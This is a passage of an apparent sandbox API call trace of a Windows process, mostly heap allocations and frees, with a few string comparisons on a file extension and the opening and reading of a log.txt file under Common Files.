lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.869] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0033.869] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889550 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.870] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.871] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.871] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.873] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c50e0 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.873] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.873] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0033.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1d0) returned 0x7c75d0 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.875] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.875] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.875] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.875] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.875] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0033.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.876] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.876] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x123d, lpOverlapped=0x0) returned 1 [0033.876] ReadFile (in: hFile=0x140, 